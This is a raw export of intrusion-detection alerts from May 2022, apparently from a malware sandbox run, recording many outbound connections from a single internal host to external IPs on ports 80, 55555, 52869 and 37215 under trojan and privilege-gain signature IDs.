    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.169.202.10050322802027121 05/14/22-02:21:05.146467
    SID:2027121
    Source Port:50322
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.213.201.6045874802027121 05/14/22-02:19:52.681868
    SID:2027121
    Source Port:45874
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.255.83.9140446555552027153 05/14/22-02:21:07.857174
    SID:2027153
    Source Port:40446
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.170.196.18440608802027121 05/14/22-02:20:29.987583
    SID:2027121
    Source Port:40608
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.50.8551920802027121 05/14/22-02:20:46.769425
    SID:2027121
    Source Port:51920
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.60.10237828555552027153 05/14/22-02:20:51.595839
    SID:2027153
    Source Port:37828
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.245.250.14248988555552027153 05/14/22-02:20:55.340538
    SID:2027153
    Source Port:48988
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.117.110.4739132802027121 05/14/22-02:19:54.486284
    SID:2027121
    Source Port:39132
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.100.5848116555552027153 05/14/22-02:20:33.576896
    SID:2027153
    Source Port:48116
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.216.22.20338146802027121 05/14/22-02:21:29.004701
    SID:2027121
    Source Port:38146
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.181.24432864555552027153 05/14/22-02:20:08.849218
    SID:2027153
    Source Port:32864
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.93.25539622555552027153 05/14/22-02:21:27.712648
    SID:2027153
    Source Port:39622
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.205.109.4436654802027121 05/14/22-02:20:28.683925
    SID:2027121
    Source Port:36654
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.249.69.12654336802027121 05/14/22-02:20:46.647552
    SID:2027121
    Source Port:54336
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.140.157.17438300802027121 05/14/22-02:20:58.303872
    SID:2027121
    Source Port:38300
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.102.2938412802027121 05/14/22-02:20:55.931558
    SID:2027121
    Source Port:38412
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.253.8939030802027121 05/14/22-02:20:46.744227
    SID:2027121
    Source Port:39030
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.168.248.17436364802027121 05/14/22-02:19:46.145602
    SID:2027121
    Source Port:36364
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.65.73.15159576802027121 05/14/22-02:20:37.010160
    SID:2027121
    Source Port:59576
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.155.6251970555552027153 05/14/22-02:19:47.505809
    SID:2027153
    Source Port:51970
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23112.211.70.22750280802027121 05/14/22-02:19:53.094256
    SID:2027121
    Source Port:50280
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2398.159.33.5059304555552027153 05/14/22-02:20:51.688681
    SID:2027153
    Source Port:59304
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.74.15834890802027121 05/14/22-02:21:41.908330
    SID:2027121
    Source Port:34890
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.79.119.17258308802027121 05/14/22-02:20:02.472815
    SID:2027121
    Source Port:58308
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.231.25254070802027121 05/14/22-02:20:36.835389
    SID:2027121
    Source Port:54070
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.165.141.1752550802027121 05/14/22-02:20:13.742226
    SID:2027121
    Source Port:52550
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.246.8633864555552027153 05/14/22-02:20:23.034239
    SID:2027153
    Source Port:33864
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.180.163.7541450802027121 05/14/22-02:19:46.154023
    SID:2027121
    Source Port:41450
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.140.5242126802027121 05/14/22-02:21:20.773526
    SID:2027121
    Source Port:42126
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.103.18840742528692027339 05/14/22-02:20:20.197589
    SID:2027339
    Source Port:40742
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.168.6.11954502802027121 05/14/22-02:20:26.062520
    SID:2027121
    Source Port:54502
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.252.1.15559942802027121 05/14/22-02:20:52.532968
    SID:2027121
    Source Port:59942
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.175.112.17855928802027121 05/14/22-02:20:55.951615
    SID:2027121
    Source Port:55928
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.197.13350746555552027153 05/14/22-02:19:52.156166
    SID:2027153
    Source Port:50746
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.226.54.9434720528692027339 05/14/22-02:20:37.007206
    SID:2027339
    Source Port:34720
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.31.137.23139652802027121 05/14/22-02:19:58.907121
    SID:2027121
    Source Port:39652
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.68.12155652555552027153 05/14/22-02:21:20.746079
    SID:2027153
    Source Port:55652
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.215.11559892555552027153 05/14/22-02:21:25.372980
    SID:2027153
    Source Port:59892
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.20.8343432802027121 05/14/22-02:20:35.403881
    SID:2027121
    Source Port:43432
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.213.134.11649508802027121 05/14/22-02:20:17.990482
    SID:2027121
    Source Port:49508
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2341.79.207.12158786372152835222 05/14/22-02:19:44.065785
    SID:2835222
    Source Port:58786
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.245.8939670555552027153 05/14/22-02:21:23.054578
    SID:2027153
    Source Port:39670
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.173.110.5153424802027121 05/14/22-02:20:13.713836
    SID:2027121
    Source Port:53424
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.182.6546118802027121 05/14/22-02:20:28.675028
    SID:2027121
    Source Port:46118
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.225.3953180555552027153 05/14/22-02:20:49.354114
    SID:2027153
    Source Port:53180
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.213.135.654294802027121 05/14/22-02:20:23.671991
    SID:2027121
    Source Port:54294
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.50.6657492802027121 05/14/22-02:20:13.699597
    SID:2027121
    Source Port:57492
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.32.13358698802027121 05/14/22-02:20:13.688657
    SID:2027121
    Source Port:58698
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.223.17758740555552027153 05/14/22-02:21:31.972177
    SID:2027153
    Source Port:58740
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.56.129.3258322802027121 05/14/22-02:20:08.154351
    SID:2027121
    Source Port:58322
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.254.36.10533430528692027339 05/14/22-02:21:42.664037
    SID:2027339
    Source Port:33430
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.235.15937460555552027153 05/14/22-02:21:18.255396
    SID:2027153
    Source Port:37460
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.130.153.19445406802027121 05/14/22-02:19:46.130154
    SID:2027121
    Source Port:45406
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.81.132.23054932555552027153 05/14/22-02:20:55.243185
    SID:2027153
    Source Port:54932
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.67.139.3048052802027121 05/14/22-02:21:23.021939
    SID:2027121
    Source Port:48052
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.126.21549052555552027153 05/14/22-02:20:55.145531
    SID:2027153
    Source Port:49052
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.215.208.10044116802027121 05/14/22-02:20:11.932503
    SID:2027121
    Source Port:44116
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.161.129.14741284802027121 05/14/22-02:20:28.494539
    SID:2027121
    Source Port:41284
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.154.217.9559972802027121 05/14/22-02:20:47.972023
    SID:2027121
    Source Port:59972
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.49.216.13936748802027121 05/14/22-02:19:48.985166
    SID:2027121
    Source Port:36748
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.123.17840392802027121 05/14/22-02:20:00.008786
    SID:2027121
    Source Port:40392
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.177.15936576802027121 05/14/22-02:20:47.978053
    SID:2027121
    Source Port:36576
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.10.6541558555552027153 05/14/22-02:19:41.124619
    SID:2027153
    Source Port:41558
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.56.61.3540458802027121 05/14/22-02:20:20.282000
    SID:2027121
    Source Port:40458
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.199.65.7034510802027121 05/14/22-02:19:54.462588
    SID:2027121
    Source Port:34510
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.247.3.22537104555552027153 05/14/22-02:20:30.363275
    SID:2027153
    Source Port:37104
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.244.73.20959122528692027339 05/14/22-02:20:43.778827
    SID:2027339
    Source Port:59122
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.211.11441284555552027153 05/14/22-02:21:29.853420
    SID:2027153
    Source Port:41284
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.56.22.6955278802027121 05/14/22-02:20:26.260830
    SID:2027121
    Source Port:55278
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.168.58.1648764802027121 05/14/22-02:20:26.110701
    SID:2027121
    Source Port:48764
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.211.24045458555552027153 05/14/22-02:19:52.139359
    SID:2027153
    Source Port:45458
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.85.25.4345908802027121 05/14/22-02:20:13.713545
    SID:2027121
    Source Port:45908
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.103.94.7859840802027121 05/14/22-02:21:23.075620
    SID:2027121
    Source Port:59840
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.99.21346012802027121 05/14/22-02:20:50.314457
    SID:2027121
    Source Port:46012
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.154.210.13841746802027121 05/14/22-02:20:29.923500
    SID:2027121
    Source Port:41746
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.166.23540510555552027153 05/14/22-02:20:18.663926
    SID:2027153
    Source Port:40510
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.140.152.6056948802027121 05/14/22-02:20:58.168915
    SID:2027121
    Source Port:56948
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.218.20539286555552027153 05/14/22-02:19:45.210598
    SID:2027153
    Source Port:39286
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.67.254.845916802027121 05/14/22-02:20:50.411338
    SID:2027121
    Source Port:45916
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.94.22359806802027121 05/14/22-02:20:52.525988
    SID:2027121
    Source Port:59806
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.117.10540092802027121 05/14/22-02:20:17.709606
    SID:2027121
    Source Port:40092
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.236.3652408555552027153 05/14/22-02:20:13.316366
    SID:2027153
    Source Port:52408
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.41.24350612802027121 05/14/22-02:20:08.506868
    SID:2027121
    Source Port:50612
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.221.12455808802027121 05/14/22-02:20:46.643939
    SID:2027121
    Source Port:55808
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.85.3.838146802027121 05/14/22-02:20:54.768744
    SID:2027121
    Source Port:38146
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.106.4347764555552027153 05/14/22-02:20:49.336809
    SID:2027153
    Source Port:47764
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.126.20444174555552027153 05/14/22-02:21:04.074579
    SID:2027153
    Source Port:44174
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.102.11154778555552027153 05/14/22-02:20:37.064924
    SID:2027153
    Source Port:54778
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.55.16553072555552027153 05/14/22-02:21:10.451979
    SID:2027153
    Source Port:53072
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.238.15539812555552027153 05/14/22-02:20:15.584199
    SID:2027153
    Source Port:39812
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.48.20460354555552027153 05/14/22-02:21:29.870634
    SID:2027153
    Source Port:60354
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.159.0.23847072802027121 05/14/22-02:19:46.170608
    SID:2027121
    Source Port:47072
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.182.10258972555552027153 05/14/22-02:20:51.596070
    SID:2027153
    Source Port:58972
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.58.157.14049154802027121 05/14/22-02:20:52.612041
    SID:2027121
    Source Port:49154
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.158.181.24746568802027121 05/14/22-02:21:41.997139
    SID:2027121
    Source Port:46568
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.71.2948646802027121 05/14/22-02:20:26.090268
    SID:2027121
    Source Port:48646
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.72.11.20659084802027121 05/14/22-02:19:47.583781
    SID:2027121
    Source Port:59084
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.21.15535856555552027153 05/14/22-02:20:51.595566
    SID:2027153
    Source Port:35856
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.150.23248246555552027153 05/14/22-02:21:18.255502
    SID:2027153
    Source Port:48246
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.89.187.10258358802027121 05/14/22-02:20:17.684228
    SID:2027121
    Source Port:58358
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.195.10640482802027121 05/14/22-02:20:52.518767
    SID:2027121
    Source Port:40482
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.99.8937294555552027153 05/14/22-02:20:49.336736
    SID:2027153
    Source Port:37294
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.159.23.5440212802027121 05/14/22-02:20:36.885865
    SID:2027121
    Source Port:40212
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.214.251.13845916802027121 05/14/22-02:20:40.684147
    SID:2027121
    Source Port:45916
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.148.20538814555552027153 05/14/22-02:20:57.564197
    SID:2027153
    Source Port:38814
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.189.8747034555552027153 05/14/22-02:20:16.017978
    SID:2027153
    Source Port:47034
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.1.20842544555552027153 05/14/22-02:20:39.510465
    SID:2027153
    Source Port:42544
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.51.20.5055028802027121 05/14/22-02:20:43.929385
    SID:2027121
    Source Port:55028
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.250.6935864555552027153 05/14/22-02:20:01.298980
    SID:2027153
    Source Port:35864
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.245.77.5953270555552027153 05/14/22-02:19:52.182191
    SID:2027153
    Source Port:53270
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.190.10558068555552027153 05/14/22-02:20:18.663728
    SID:2027153
    Source Port:58068
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.216.99.21346096802027121 05/14/22-02:20:52.532593
    SID:2027121
    Source Port:46096
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.164.248.24352370802027121 05/14/22-02:20:44.164196
    SID:2027121
    Source Port:52370
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.187.11833690555552027153 05/14/22-02:21:25.372611
    SID:2027153
    Source Port:33690
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.255.81.24951928555552027153 05/14/22-02:20:37.030447
    SID:2027153
    Source Port:51928
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.105.18639746802027121 05/14/22-02:20:26.046847
    SID:2027121
    Source Port:39746
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.212.135.17251110802027121 05/14/22-02:20:32.203168
    SID:2027121
    Source Port:51110
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.77.2843922802027121 05/14/22-02:19:52.752680
    SID:2027121
    Source Port:43922
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.88.166.6043526802027121 05/14/22-02:20:58.091978
    SID:2027121
    Source Port:43526
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.249.18055858802027121 05/14/22-02:19:48.967211
    SID:2027121
    Source Port:55858
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.129.58.14840528802027121 05/14/22-02:19:59.897192
    SID:2027121
    Source Port:40528
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.130.41.5755030802027121 05/14/22-02:21:39.694247
    SID:2027121
    Source Port:55030
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.247.23.14933140528692027339 05/14/22-02:20:04.128716
    SID:2027339
    Source Port:33140
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.145.15458058802027121 05/14/22-02:20:43.914921
    SID:2027121
    Source Port:58058
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.174.218.18143366802027121 05/14/22-02:20:08.056947
    SID:2027121
    Source Port:43366
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.203.43.20546484802027121 05/14/22-02:19:48.978854
    SID:2027121
    Source Port:46484
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.67.207.24937450802027121 05/14/22-02:20:13.786820
    SID:2027121
    Source Port:37450
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.158.24753372555552027153 05/14/22-02:21:29.853164
    SID:2027153
    Source Port:53372
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.174.7959670555552027153 05/14/22-02:21:29.853526
    SID:2027153
    Source Port:59670
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23112.211.168.7051170802027121 05/14/22-02:20:44.370088
    SID:2027121
    Source Port:51170
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.183.14.15040654802027121 05/14/22-02:20:28.453314
    SID:2027121
    Source Port:40654
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.110.156.2850126802027121 05/14/22-02:20:37.002385
    SID:2027121
    Source Port:50126
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.255.123.23145990802027121 05/14/22-02:20:58.151438
    SID:2027121
    Source Port:45990
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.218.3652794802027121 05/14/22-02:20:36.849112
    SID:2027121
    Source Port:52794
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.57.137.4435764802027121 05/14/22-02:19:47.603593
    SID:2027121
    Source Port:35764
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.237.5248506802027121 05/14/22-02:19:59.979384
    SID:2027121
    Source Port:48506
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.143.19140842555552027153 05/14/22-02:20:01.315968
    SID:2027153
    Source Port:40842
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.157.11938330555552027153 05/14/22-02:21:10.434660
    SID:2027153
    Source Port:38330
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.67.236.10434772802027121 05/14/22-02:21:12.051253
    SID:2027121
    Source Port:34772
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.130.3049426555552027153 05/14/22-02:20:15.584018
    SID:2027153
    Source Port:49426
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.211.77.13344586802027121 05/14/22-02:20:11.849716
    SID:2027121
    Source Port:44586
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.113.20547404802027121 05/14/22-02:20:58.154043
    SID:2027121
    Source Port:47404
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.123.8133790802027121 05/14/22-02:20:14.957069
    SID:2027121
    Source Port:33790
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.164.215.2837200802027121 05/14/22-02:19:59.939204
    SID:2027121
    Source Port:37200
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.156.12945514555552027153 05/14/22-02:21:37.096756
    SID:2027153
    Source Port:45514
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.142.35.11147804802027121 05/14/22-02:20:20.225240
    SID:2027121
    Source Port:47804
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.128.19952794802027121 05/14/22-02:21:25.420858
    SID:2027121
    Source Port:52794
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.134.15433580802027121 05/14/22-02:21:30.293865
    SID:2027121
    Source Port:33580
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.114.23559868802027121 05/14/22-02:20:43.921036
    SID:2027121
    Source Port:59868
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.71.190.16349970802027121 05/14/22-02:21:09.608021
    SID:2027121
    Source Port:49970
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.81.233788802027121 05/14/22-02:20:17.887528
    SID:2027121
    Source Port:33788
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.217.343272802027121 05/14/22-02:20:36.987400
    SID:2027121
    Source Port:43272
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.174.24.16455000802027121 05/14/22-02:20:54.836620
    SID:2027121
    Source Port:55000
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.60.2346124802027121 05/14/22-02:19:49.002413
    SID:2027121
    Source Port:46124
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
